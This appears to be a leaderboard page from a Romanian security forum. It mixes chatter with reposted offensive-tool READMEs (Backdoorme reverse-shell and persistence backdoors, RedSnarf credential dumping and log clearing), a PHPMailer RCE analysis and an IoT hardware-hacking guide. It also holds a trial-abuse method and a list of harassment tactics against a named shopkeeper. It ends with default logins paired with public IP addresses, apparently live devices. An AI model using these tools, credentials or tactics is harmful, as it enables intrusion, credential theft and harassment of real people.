Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/08/17 in all areas

  1. Pai daca aia vad un retardat cu ceva ce seamana cu o arma, cred si eu ca se alarmeaza
    5 points
  2. Furnizorii de acolo au succes pentru ca vand hardware folosit. Serverul este ca o masina, trebuie sa aibe rodajul facut. Nici nu as cumpara un server brand new care nu are rodajul facut, sa ma trezesc cu șpan de la strung sau cu suruburi sarite.
    3 points
  3. Aveti grija cu ei, dupa ce cumperi domeniul nu o sa te mai lase sa intri in cont, poti sa dai 1000 de tickete si sa restezi parola tot de atatea ori.
    2 points
  4. Eu nu pricep ce e cu leaseweb acolo. 1. nu e furnizor roman 2. nu are de unde sa stie el daca hardware-ul e folosit sau nu. Ma indoiesc ca arunca cineva un server nou dupa ce l-a folosit clientul 3 luni. Doar nu e prezervativ.
    2 points
  5. https://www.udemy.com/ios-10-bootcamp-swift-objective-c-tutorial/?couponCode=IOS10LIMITEDD https://www.udemy.com/kali-linux-hacking/?couponCode=BESTBLACKHAT https://www.udemy.com/the-ethical-hacking-starter-kit-/?couponCode=2000FREE https://www.udemy.com/penetration-testing/?couponCode=WOO052816 https://www.udemy.com/androidcourse/?couponCode=ANDROIDFREE https://www.udemy.com/the-complete-jenkins-course-for-developers-and-devops/?couponCode=FR0002
    2 points
  6. 1- Intrati aici si descarcati programelul. https://billing.hideipvpn.com/downloads.php?action=displaycat&catid=9 2- Completati casetele First Name si Last Name cu nume la alegere https://www.hideipvpn.com/free-vpn-trial/ Pentru mail puteti folosi ThrowAwayMail. http://www.throwawaymail.com/ 3- In scurt timp veti primi pe mail numele de utilizator si parola necesare pentru logarea in program. Datele sunt valabile pentru 24 de ore, dupa care puteti repeta pasii folosind browserul TOR. In cazul in care primiti vreo eroare la creearea noului cont alegeti o identitate noua, sau dupa caz faceti o curatare cu CCleaner. Sper sa va fie folositoare metoda.
    1 point
  7. PHP Secure Configuration Checker Check current PHP configuration for potential security flaws. Simply access this file from your webserver or run on CLI. Author This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks. Link: https://github.com/sektioneins/pcc
    1 point
  8. Strainul are o vorba: "better safe than sorry". In afara ca te-au oprit si legitimat doar nu ti-au facut nimic. Te-as intreba pe tine ce ai face daca ai fi in locul lor dar cum nu esti cu toti boii acasa ii intreb pe cei de aici: daca ati fi gabori si mergeti pe strada si vedeti pe unul care are antecedente si in instruire sunteti pregatiti sa luati acestea in considerare si il vedeti cu ceva ce par a fi arme, chiar daca ar fi si pistoale cu apa: il lasati sa-si vada in continuare de drum sperand ca nu-l vedeti mai apoi la stirile de la 5pm sau il intrebati de sanatate? Esti doar un attention whore
    1 point
  9. Hai man, tu ai 5.56 el are 6mm (evident, bilute) :))))))) Ai vazut ca am avut si eu tragere de revelion, hahaha
    1 point
  10. Si cand te gandesti ca altii se joaca cu famas-ul... :-)) @aelius nu e asa? :-))
    1 point
  11. Sa suga ciotu de la mazilu serghey, numa daca te pui sa cauti despre hetnix apare pe 1032103012301 de forumuri ))
    1 point
  12. Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained. Please only use Backdoorme with explicit permission - please don't hack without asking. Usage Backdoorme is split into two parts: backdoors and modules. Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety. Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence. Demonstration: Setup To start backdoorme, first ensure that you have the required dependencies. For Python 3.5+: $ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ virtualenv --python=python3.5 env $ source env/bin/activate (env) $ pip install -r requirements.txt For Python 2.7: $ sudo python dependencies.py Getting Started Launching backdoorme: $ python master.py To add a target: >> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> Backdoors To use a backdoor, simply run the "use" keyword. >> use shell/metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword. (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False ... (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... As in metasploit, backdoors are organized by category. Auxiliary keylogger - Adds a keylogger to the system and gives the option to email results back to you. simplehttp - installs python's SimpleHTTP server on the client. user - adds a new user to the target. web - installs an Apache Server on the client. Escalation setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor. shell - the shell backdoor is a priviledge escalation backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unpriviledged user, simply run ".bash -p", and you will have root access. Shell bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash. bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side. sh - Similar to the first bash backdoor, but redirects input to /bin/sh. sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh. metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell. java - creates a socket connection using libraries from Java and compiles the backdoor on the target. ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash. netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell. netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell. perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous. php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module python - uses a short python script to perform commands and send output back to the user. web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor. Access remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces. ssh_key - creates RSA key and copies to target for a passwordless ssh connection. ssh_port - Adds a new port for ssh. Windows windows - Uses msfvenom to create a windows backdoor. Modules Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword. (msf) >> add poison + Poison module added Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options. (msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False Currently enabled modules include: Poison Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently. Cron Adds an existing backdoor to the root user's crontab to run with a given frequency. Web Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin. User Adds a new user to the target. Startup Allows for backdoors to be spawned with the bashrc and init files. Whitelist Whitelists an IP so that only that IP can connect to the backdoor. Targets Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available. Contributing Backdoorme is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer backdoor, or something we could improve? Make an issue and we'll add it ASAP! Please email us at backdoormegit@gmail.com with any questions. If you wish to add your own backdoor, follow the directions given in the backdoorme/backdoors/template.py file. If you wish to add your own module, follow the directions given in the backdoorme/modules/template.py file. Cheat Sheet for developers: Execute command on system: self.core.curtarget.ssh.exec_command("command") Retrieve an option: self.get_value("option") Execute command on system with root: self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S command") Source: https://github.com/Kkevsterrr/backdoorme
    1 point
  13. PHP is an open source, general-purpose scripting language used for web development that can also be embedded into HTML. It has over 9 million users, and is used by many popular tools, such as WordPress, Drupal, Joomla!, and so on. This week, a high-level security update was released to fix a remote code execution vulnerability (CVE-2016-10033) in PHPMailer, which is an open source PHP library for sending emails from PHP websites. This critical vulnerability is caused by class.phpmailer.php incorrectly processing user requests. As a result, remote attackers are able to execute code on vulnerable servers. This vulnerability affects PHPMailer versions before 5.2.18. Analysis When sending an email with PHPMailer, the normal process is, 1) PHPMailer gets user requests, 2) PHPMailer validates the user supplied data, 3) PHPMailer sends the data to the PHP mail() function to send the email. In the validation stage, PHPMailer validates the user supplied data, as shown in the code below. This validator uses standard validation methods, like PHP’s built-in FILTER_VALIDATE_EMAIL, pcres from squiloople.com, and html5 default patterns for email type. For example, the $address with value “attacker -InjectedParam @example.com” will be rejected. But these methods follow RFC3696, which means the email address can contain spaces when quoted with “"”, so an $address with value “"attacker -InjectedParam"@example.com” will pass through the filter. After the validation stage, PHPMailer will send the email elements, such as receiver address, subject, body, header, and sender address to the PHP mail() function to send the email. The code is shown below. The issue here is that PHPMailer doesn’t sterilize these email values before sending them to the mail() function. It just returns the and then sends the $result to the mail() function with the same set of parameters. This issue enables the subsequent attacks. For example, when sending the request with email address: The mail() function will execute /usr/bin/sendmail with 4 arguments, “/usr/bin/sendmail”, “-t”, “-i” and “-fattacker -InjectedParam@example.com”. However, an attacker could break the fourth argument by injecting a parameter with “\"”. For example, using the email address: This email address will let the sendmail function execute 6 arguments, “/usr/bin/sendmail”, “-t”, “-i”, “-fattacker”, “-InjectedParam1” and “-InjectedParam2"@example.com”. How to Reproduce In order to reproduce the attack, I have built a web server, as shown in Figure 1. Figure 1. Testing the PHPMailer server The source code is: This is a form similar to the “send feedback” function on some online websites. An attacker could send an email with a malicious email address to execute sendmail arguments, such as: The PHP code can then be added to the Name or Message part of the string. For example,. This is shown in Figure 2, below. Figure 2. Sending the attack email Before sending this email, the files in the web root directory are shown in Figure 3. The index.php is the code of the webpage shown in Figure 1 ,and the directory “vulnerable” contains the PHPMailer files. Figure 3. Web root directory before sending the attack email The payload for sending this email is shown in Figure 4, below. Figure 4. Attack payload After sending this attack email, a new file “test.php” is created. It contains the RAW data for sending this email, which contains our PHP code “”. It’s shown in Figure 5. Figure 5. Web root directory after sending the attack email Then we can access our shell PHP file test.php and run commands. For example, we could execute the command “cat /etc/passwd”, as shown in Figure 6. Figure 6. Execute the command “cat /etc/passwd” on a test web server In conclusion, the actual attack could be an arbitrary file upload that exploits the vulnerability in the PHPMailer filter for the sender email address. This means that an attacker could send an email with malicious code to the server, use the sendmail arguments to move the log file with the malicious code to the web root directory, and then execute the code remotely. Solution All users of PHPMailer should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from this vulnerability with the signature PHPMailer.Remote.Code.Execution. Source: http://blog.fortinet.com/2017/01/05/analysis-of-phpmailer-remote-code-execution-vulnerability-cve-2016-10033
    1 point
  14. The Introductory IoT Hardware Hacking Tool Box Aggregated here you will find some of the most popular tools for reverse engineering embedded electronics, as well as some documentation and tutorials on how to get started using them. If you have been interested in hardware hacking and modding, and even developing software exploits there has never been a better time to jump in and learn. Based on the items listed here I will introduce you to some foundational knowledge so that you can start your journey. The general process to hardware hacking follows a few main steps. First you want to pick a target device that interests you. You may want to pick a device with known vulnerabilities to practice on or a high value target. The Exploitee.rs Wiki has a range of IoT devices with known vulnerabilities and directions on how to exploit them. (Check out this UART to root shell on a Wink hub.) High value could mean that it is a popular consumer electronic device or that comprising it could have have a large impact on safety and privacy. Next you will need to gain access to the hardware’s electronics. This is bit more involved since a lot of devices are physically designed to make it difficult to access the embedded electronics. They have hard plastic shells and hidden screws that require uncommon bits to open. Finally using the following hardware tools you will identify debug ports and serial protocol interfaces, dump firmware, and reverse engineer the target device. Hardware These tools will allow you to explore your target device through the hardware’s various serial bus interfaces or allow you to dump the firmware image from the device for reverse engineering the software. The firmware image is a compressed file, containing the operating system and its files, it may contain interesting things like the code to the web interface that most these devices have. You can then run that dumped code and reverse engineer it on an emulator like QEMU. Some of the main serial bus interfaces that the following hardware tools can connect to are JTAG, UART, I2C, and SPI. (Please refer to the links on the previous listed protocols to get in-depth explanations of them from a hardware hacking perspective.) Researching all the serial interfaces and their protocols will help you understand how to effectively use following hardware tools for reverse engineering and exploiting IoT devices. Shikra Purchase Resources: Xipiter’s how to use guide This device is touted as a more stable tool compared to the Bus Pirate. The hardware is very reliable and stable for connecting to UART, JTAG, and SPI. Many people in the Software Exploitation via Hardware Exploitation community really enjoy using this somewhat lesser known device and is used in the SEXviaHEXtraining. If you want to pull the firmware image off a target IoT device for software exploitation then the Shikra is a great tool for the job. Just connect the Shikra to the target device’s SPI chip. You may need an 8-pin SOIC clip to connect the Shikra to the SPI interface. In the how to use guide linked above, it was claimed to have taken the Bus Pirate 30 minutes to dump a 4MB firmware image off a device compared to just under a minute for the Shikra to do the same job. The Shikra may be something less people are familiar with, but it provides consistent, powerful and fast performance for certain jobs. https://en.wikipedia.org/wiki/Bus_Pirate Bus Pirate Purchase Resources: Documentation Forums Dangerous Prototypes’ tutorial This is one of the most widely used tools out there right now. At the time of this blog’s posting the Bus Pirate version 4 official firmware development seems to have been abandoned. This has caused a lot of headaches for users struggling to get features to work on version 4 as well as they did on version 3. For example some people have had difficulties with getting JTAG support to work on version 4. As stated in the documentation link, the version 3 firmware has a strong community effort behind it. As long as there is a strong community backing this tool that community will be committed to fixing and maintaining the firmware of the Bus Pirate. Overall the Bus Pirate is a vey robust tool. Finding someone to help you use it will not be hard, try joining the forums. https://www.parallax.com/product/32115 JTAGulator Purchase Resources: Joe Grand’s video overview of the tool Senrio’s explanation of JTAG Besides looking badass this tool is great for identifying what the the different pinouts and chips do on the target device. When you open up the device it is not going to be obvious what pinouts and chips run which serial protocols. Testing each one with the JTAGulator will help you find your UART, JTAG, SPI, and other serial protocol interfaces. http://hackerwarehouse.com/product/facedancer21/ Facedancer21 Purchase Resources: Travis Goodspeed’s blog GoodFET’s documentation Not every IoT device is going to have a USB port, but this tool can be very useful when one is available. The Facedancer, besides having a cool name, essentially lets your computer become the USB drive plugged into a device. Within this emulation you can communicate to the target device over the USB bus with Python. Devices often trust USB drives plugged into them so exploring the target device from this perspective can be very rewarding. https://www.sparkfun.com/products/8430 Make sure you get all the probes and jumper cables required for connecting the target device to the hacking tool and then back to your computer. Most of these linked articles for these hardware tools show what you will need. The wires and cables will plug onto the pinouts or clip onto different chips. Having a variety of male to male, female to female, and male to female wires is definitely helpful. https://www.seeedstudio.com/Bus-Pirate-v3-probe-Kit-p-526.html Tools It may not be as interesting as the the hardware tools above, but before you can even get to the IoT device’s juicy electronic guts you need to make sure you have the proper tools to gain access to them. If you are feeling cheap then you can always just skip this last section and smash the IoT device open with a rock. Tempting as that might sound you risk damaging the electronics. Many IoT devices use screws that require tools other than Phillips or flathead. You are likely to encounter Torx security, tri-point, gamebit, and spanner screws to name a few. The screws also require 1–4mm bits to unscrew them. https://www.ifixit.com/Store/Tools/64-Bit-Driver-Kit/IF145-299 64 Bit Driver Kit Purchase The 64 Bit Driver Kit is a highly recommended set of bits that should help get you into most electronic devices much better than 32 bit or 16 bit. This set has about 15 types of screw bits with multiple sizes of each. This might be overkill to add to your tool set, but you probably won’t ever have to buy anymore bits after getting this set! If you know what screws your device has then you can find much smaller kits with the specific pieces you need. https://www.ifixit.com/Store/Tools/Jimmy/IF145-259 Jimmy (spudger) Purchase Another great tool for you you to have on hand when trying to pry these devices open is some type of jimmy. Many of these devices will be sealed closed with some sort of snap together plastic. Using a tool like this can help you pull the plastic shells apart and let you gain access to the electronic goodies inside. If you think this is too much of a uni-tasker then you can fashion a similar tool yourself. Even a sturdy guitar pick could work! Source: https://blog.securityevaluators.com/the-introductory-iot-hardware-hacking-tool-box-389c4605329f#.8thh1ho2h
    1 point
  15. - Gsm jammer. Nu iti mai merg nici tie mobilele nici lui. - Platesti niste boschetari sa stea tot timpul pe acolo pe capul lui. - Cumperi tuica de la piata si aduci niste drojdieri sa stea in cur la el pe scara in fata buticului. - Faci comenzi la sicrie, coroane de morti si tot felul de astea pe adresa lui. - Te caci noaptea la el in fata usii si lasi un postit cu "La multi ani" scris pe el. - Te plimbi prin fata buticului scarpinandu-te la pula in semn de dispret. Daca vine politia, nu are ce-ti face. E ceva normal sa te manance la pula. - Publica-i mosului numarul de telefon pe 400 de comunitati gay impreuna cu descrieri frumoase ca e pasiv, ca presteaza, etc. Poti sa spui ca e curvostina si panarama penala si sa-i publici anuntul pe o gramada de site-uri. - Suna cu numar ascuns diversi GAY de pe forumuri si da-ti intalnire cu ei, in numele lui :))) - Pune-i cacat pe cleanta. - Baga-i scobitori cu super glue in incuietori. - Ce comenzi onoreza ? Daca e ceva de mancare, fa laba pe ele si mergi cu ele la analize, reclama-l peste tot. - Daca serveste ceva la masa. Pune niste tovarasi sa comande ceva si sa puna in mancare fire de par si tot felul de cacaturi si sa sara ca fripti de la mese, sa incepe sa se vaicareasca tare sa auda si ceilalalti clienti.
    1 point
  16. Domnul balls, rusine (muie) tie pentru ca dupa ce ai o gandire limitata, te mai si inflamezi ca fundul unei scroafe in calduri. Prostul daca nu-i fudul, nu-i prost destul. Partea tehnica nu e singurul considerent ci sunt multe altele: - quality assurance (controlul calitatii): Chiar daca sunt facute tot in China sau orice alta tara asemanatoare, companiile gen Google, Apple, Samsung, etc - au procedee de control al calitatii mult mai bine definite, controlate si impuse si standarde ridicate. Nu la fel poate fi spus despre restul firmelor de "Chicken chow mein" si "Irinel si balanel" - marketing: Cand o companie "noname" da cu bata in balta are un efect mult mai mic fata de o companie cu market share ridicat, mai ales ca multe din ele nici nu sunt listate la bursa. Cand se intampla nasoale la o firma mare (gen Samsung recent) erau trambitate stirile pe toate canalele media (scrisa, radio, tv, online). Dar cand o sfecleste o firma "noname" de abia scrie pe un site/blog amarat. Restul nu isi permit sa faca greseli majore. - legislatie: Tinand cont ca multi demnitari (ministri, parlamentari, guvern, executiv, etc.) folosesc astfel de produse, ma indoiesc ca o tara ar permite comercializarea in masa a unor astfel de produse cu buna stiinta ca au backdoor catre alte tari. Din contra, de exemplu guvernul US ar vrea sa aiba ei treburile lor instalate pe produsele Apple daca ar putea. - patents: Pe un singur model sunt enorm de multe patente si secrete de productie care nu sunt neaparat cunoscute celorlalte firme mici. Companiile gen Google, Samsung, Apple, etc. au invatat din multe greseli de productie - cele noi inca au de invatat. - consumer behaviour: Am amici chinezi, lucrez cu ei, etc. si cunosc bine acest lucru: In China, Japonia si restul pietelor din jur exista un obicei la tineri sa schimbe telefoanele mult mai des fata de Europa. Nu m-am uitat dupa research dar probabil media e undeva la 2-3 telefoane / an. So, avand un astfel de target customer de ce ai face telefoane mai durabile si de calitate si te chinui si investesti in telefoane care sa tina 3 ani cand ei le schimba dupa 7-8 luni. - premium / emerging customers: Calitatea produselor este definita si de zonele unde sunt vandute. Acelasi telefon care e vandut in UK va avea o anumita calitate, vandut in Ukraina va avea o alta calitate is vandut in Gambia o alta. La fel si cu hainele, se vede calitatea aproape instant (sau dupa prima spalare) chiar daca toate sunt facute in Bangladesh/Pakistan. Cand produsul este vandut unei tari care are legi bine definite de returnare, asteptarile clientilor sunt ridicate si isi permit sa plateasca premium - li se livreaza ce-i mai bun. Restul primesc mai la noroc. Inca in tarile arabe anumite produse au specificatia in magazin: facute pentru Europa si facute pentru Middle East! Si lista poate continua...
    1 point
  17. ______ .____________ _____ \______ \ ____ __| _/ _____/ ____ _____ ________/ ____\ | _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\ | | \ ___// /_/ |/ \ | \/ __ \| | \/| | |____|_ /\___ >____ /_______ /___| (____ /__| |__| \/ \/ \/ \/ \/ \/ RedSnarf is a pen-testing / red-teaming tool by Ed William and Richard Davy for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques. RedSnarf functionality includes: • Retrieval of local SAM hashes; • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password; • Retrieval of MS cached credentials; • Pass-the-hash; • Quickly identify weak and guessable username/password combinations (default of administrator/Password01); • The ability to retrieve hashes across a range; • Hash spraying - o Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space; • Lsass dump for offline analysis with Mimikatz; • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing; • Dumping of Domain controller hashes using the drsuapi method; • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator'; • Ability to decrypt cpassword hashes; • Ability to start a shell on a remote machine; • The ability to clear the event logs (application, security, setup or system); (Internal Version only) • Results are saved on a per-host basis for analysis. • Enable/Disable RDP on a remote machine. • Change RDP port from 3389 to 443 on a remote machine. • Enable/Disable NLA on a remote machine. • Find where users are logged in on remote machines. • Backdoor Windows Logon Screen • Enable/Disable UAC on a remote machine. • Stealth mimikatz added. • Parsing of domain hashes • Ability to determine which accounts are enabled/disabled RedSnarf Usage ======================= Requirements: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - used with parsing Mimikatz info locally Show Help ./redsnarf.py -h ./redsnarf.py --help Retrieve Local Hashes ======================= Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log ./redsnarf.py -H ip=10.0.0.50 -uC security Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log ./redsnarf.py -H ip=10.0.0.50 -uC application Retrieve Local Hashes from a single machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . Retrieve Local Hashes from a single machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using local administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d . Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com Retrieve Hashes across a network range using domain administrator credentials ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com Hash Spraying ======================= Spray Hashes across a network range ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d . Retrieve Hashes across a network range domain login ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com Quickly Check Credentials ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y Quickly Check File containing usernames (-hS) and a generic password (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y Retrieve Domain Hashes ======================= Retrieve Hashes using drsuapi method (Quickest) This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y) Retrieve Hashes using NTDSUtil This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y) Information Gathering ======================= Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y Decrypt Cpassword ./redsnarf.py -uG cpassword Find User - Live /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name Find User - Offline (searches pre downloaded information) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name Misc ======================= Start a Shell on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y Start a Shell on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y Run stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y Run Custom Command Example 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user' Example 2 - Double Quotes need to be escaped with \ ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \"domain admins\" | dsget group -members -expand' Local Access Token Policy Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings. ./redsnarf.py -rL y Wdigest Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q UAC Enable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e Disable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d Query UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate Enable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e Disable Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d Query Backdoor registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q RDP ======================= RDP Enable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e Disable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d Query RDP status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e Change RDP Port to default of 3389 on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d Query RDP Port Value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q NLA ======================= Enable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e Disable NLA on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d Query NLA status on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q Sursa: https://github.com/nccgroup/redsnarf
    1 point
  18. Bun venit Dragnea.. AHAHAHAHAH LOL pacat ca hotarasc soarta tarii oamenii care mai au 2 ani de trait hahhha
    1 point
  19. ts:ts:173.217.247.91 ubnt:ubnt:73.134.253.166 ubnt:ubnt:73.137.185.48 ubnt:ubnt:73.159.253.162 ubnt:ubnt:73.12.239.170 ubnt:ubnt:73.131.219.246 ubnt:ubnt:73.149.83.81 ubnt:ubnt:73.1.134.80 ubnt:ubnt:73.139.171.12 ubnt:ubnt:73.153.224.92 ubnt:ubnt:73.189.9.185 ubnt:ubnt:73.192.98.204 ubnt:ubnt:73.158.250.239 pi:raspberry:73.11.43.59 ubnt:ubnt:73.193.4.44 ubnt:ubnt:73.157.208.104 pi:raspberry:73.187.4.83 ubnt:ubnt:73.18.107.168 ubnt:ubnt:73.185.132.63 pi:raspberry:73.185.132.63 pi:raspberry:73.183.4.235 pi:raspberry:73.185.72.8 ubnt:ubnt:73.192.68.238 pi:raspberry:73.20.34.164 ubnt:ubnt:73.155.199.138 ubnt:ubnt:73.210.232.131 ubnt:ubnt:73.207.161.62 pi:raspberry:73.187.192.84 ubnt:ubnt:73.25.178.190 ubnt:ubnt:73.222.111.208 pi:raspberry:73.223.174.200 ubnt:ubnt:73.223.134.170 pi:raspberry:73.222.19.109 pi:raspberry:73.3.91.162 ubnt:ubnt:73.208.187.26 ubnt:ubnt:73.237.0.24 pi:raspberry:73.21.71.254 ubnt:ubnt:73.196.248.59 ubnt:ubnt:73.42.216.185 ubnt:ubnt:73.49.40.102 ubnt:ubnt:73.54.122.222 ubnt:ubnt:73.4.20.53 ubnt:ubnt:73.52.172.53 ubnt:ubnt:24.10.183.246 ubnt:ubnt:73.166.54.117 ubnt:ubnt:73.39.226.80 ubnt:ubnt:24.102.233.173 ubnt:ubnt:73.206.69.194 ubnt:ubnt:24.107.124.235 ubnt:ubnt:73.34.53.217 ubnt:ubnt:24.107.201.24 ubnt:ubnt:24.111.38.7 ubnt:ubnt:24.113.38.195 ubnt:ubnt:24.113.38.194 ubnt:ubnt:24.1.123.94 ubnt:ubnt:24.117.189.72 